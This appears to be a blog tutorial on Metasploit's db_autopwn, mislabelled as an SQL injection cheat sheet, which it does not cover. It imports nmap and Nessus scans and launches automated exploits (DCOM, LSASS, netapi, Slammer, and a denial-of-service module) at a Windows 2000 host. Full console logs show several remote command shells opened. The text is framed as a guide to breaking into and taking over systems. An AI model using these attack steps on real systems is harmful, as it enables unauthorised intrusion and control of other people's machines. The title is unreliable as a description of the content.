SQL Injection Cheat Sheet | Auto Pwn | Metasploit

This is part three of a series discussing different methods in which one can break into a system and take it over. This SQL Injection Cheat Sheet covers penetration software such as Metasploit and Nessus to find weaknesses in a system. It will also guide the readers on how to auto pwn (exploit/hack/flood) a target into submission.


A Little History Lesson

H. D. Moore - Metasploit - SQL Injection Cheat Sheet
HD Moore created Metasploit, one of the most influential hacking tools, at age 22.

In 2003, H.D. Moore created Metasploit (also known as the Metasploit Project), a project aimed at computer security. Metasploit collects data about new cyber threats and system vulnerabilities and then provides private and government entities with that information.

It also conducts IDS signature development and penetration testing.

Another similar piece of software is Nessus, create by Tenable Network Security, which has been around a few years longer than Metasploit.

According to some surveys conducted by sectools.org in 2009, Nessus came in first place as the world’s most used vulnerability scanner in 2000, 2003 (the year Metasploit first appeared on the scene), and 2006.

In 2005, over 75,000 organizations throughout the world were using Nessus according to a study done by Tenable Network Security. One of the awesome things about Nessus is it is free to use for personal use in a non-commercial setting.

The Nessus Project was created by Renaud Deraison in 1998. Deraison’s goal was to provide a free remote security scanner of the Internet community. In October 2005, Tenable Network Security released Nessus 3 as a closed source license. Nevertheless, it is still free for non-institutional use.


SQL Injection Cheat Sheet


[0x03] – Metasploit Ninja – Auto Pwned

Metasploit is a tool for exploiting system vulnerabilities. Nevertheless, the penetration tester needs to find those vulnerabilities first. This is one of the drawbacks of Metasploit. However, the latest version of Metasploit has added a feature called Autopwned which automatically exploits vulnerabilities reported from nmap or Nessus.

Note: Metasploit has one feature called Autopwn Metasploit Automated. This feature can scan all networks by using nmap and automated exploits.


[0x03a] – Nmap + Metasploit Autopwned

bt ~ # nmap -sS 192.168.80.129 -oX nmap.xml
Starting Nmap 4.85BETA10 ( http://nmap.org )
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports

PORT STATE SERVICE

80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
45/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

Now there is a nmap.xml that can be imported into the Metasploit framework.

[Import Nmap Result to Metasploit]

bt framework3 # msfconsole

_ _ _ _

| | | | (_) |

_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_

| '_ ` _ / _ __/ _` / __| '_ | |/ _ | | __|

| | | | | | __/ || (_| __ |_) | | (_) | | |_

|_| |_| |_|___|____,_|___/ .__/|_|___/|_|__|

| |

|_|

=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux
msf >; load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf >; db_create /tmp/test.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /tmp/test.db
msf >; db_import_nmap_xml /root/nmap.xml
msf >; db_hosts
[*] Time: Fri Jul 03 14:01:56 +0000 2009 Host: 192.168.80.129 Status: alive OS:
msf >; db_autopwn -p -e
[*] (3/116): Launching exploit/unix/webapp/tikiwiki_jhot_exec against 192.168.80.129:80...
[*] (8/116): Launching exploit/unix/webapp/awstats_configdir_exec against 192.168.80.129:80...
[*] (9/116): Launching exploit/windows/http/bea_weblogic_transfer_encoding against 192.168.80.129:80...
[*] Started bind handler
[*] Started bind handler
[*] (12/116): Launching exploit/unix/webapp/awstats_migrate_exec against 192.168.80.129:80...
[*] (13/116): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] Started bind handler
[*] Started bind handler
[*] Job limit reached, waiting on modules to finish...
[*] The server returned: 404 Object Not Found
[*] This server may not be vulnerable
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] ...
[*] The server returned: 404 Object Not Found
[*] This server may not be vulnerable
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.80.131:52929 ->; 192.168.80.129:10529)
.......
.......
sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.80.131:52929 ->; 192.168.80.129:10529
2 Command shell 192.168.80.131:50775 ->; 192.168.80.129:17887
3 Command shell 192.168.80.131:40985 ->; 192.168.80.129:37295
4 Command shell 192.168.80.131:51652 ->; 192.168.80.129:37095
5 Command shell 192.168.80.131:38373 ->; 192.168.80.129:17130
6 Command shell 192.168.80.131:56722 ->; 192.168.80.129:20693
msf >;sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:WINNTsystem32>;ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2
C:\WINNT\system32>;

[0x03b] – Nessus + Metasploit Auto Pwned

First, the Nessus scanner must be used with a VA and export file with *.nbe, then import them to the Metasploit framework for the auto pwn operation.

[Import Nessus(nbe) Result to Metasploit]

bt framework3 # msfconsole
# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #
=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux
msf >; load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf >; db_create /tmp/ness.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /tmp/ness.db
msf >; db_import_nessus_nbe /root/demo.nbe
msf >; db_hosts
[*] Time: Fri Jul 03 14:43:58 +0000 2009 Host: 192.168.80.129 Status: alive OS:
msf >; db_autopwn -x -t
[*] Analysis completed in 4.28915095329285 seconds (17 vulns / 1145 refs)
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.80.129:445...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445...
[*] Matched exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445...
msf >; db_autopwn -x -e
[*] (2/6): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] (3/6): Launching exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445...
[*] Started bind handler
[*] (4/6): Launching exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434...
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] ...
[*] (5/6): Launching exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] ...
[*] Started bind handler
[*] (6/6): Launching exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445...
[*] Sending UDP packet with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Started bind handler
[*] Connecting to the SMB service...
[*] Sending exploit ...
msf >;
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[email protected]_np:192.168.80.129[BROWSER] ...
[*] Started bind handler
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:[email protected]_np:192.168.80.129[browser] ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.80.131:41655 ->; 192.168.80.129:39354)
[*] Command shell session 2 opened (192.168.80.131:57118 ->; 192.168.80.129:7605)
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:192.168.80.129[lsarpc]...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[email protected]_np:192.168.80.129[BROWSER] ...
[*] Building the stub data...
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:[email protected]_np:192.168.80.129[browser] ...
[*] Calling the vulnerable function...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:192.168.80.129[lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.0
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 3 opened (192.168.80.131:50407 ->; 192.168.80.129:15299)
[*] Command shell session 4 opened (192.168.80.131:32768 ->; 192.168.80.129:30092)
[*] The DCERPC service did not reply to our request
[*] Command shell session 5 opened (192.168.80.131:39556 ->; 192.168.80.129:17330)
sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.80.131:41655 ->; 192.168.80.129:39354
2 Command shell 192.168.80.131:57118 ->; 192.168.80.129:7605
3 Command shell 192.168.80.131:50407 ->; 192.168.80.129:15299
4 Command shell 192.168.80.131:32768 ->; 192.168.80.129:30092
5 Command shell 192.168.80.131:39556 ->; 192.168.80.129:17330
msf >; sessions -i 3
[*] Starting interaction with 3...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:WINNTsystem32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2
C:\WINNT\system32>

Leave a Reply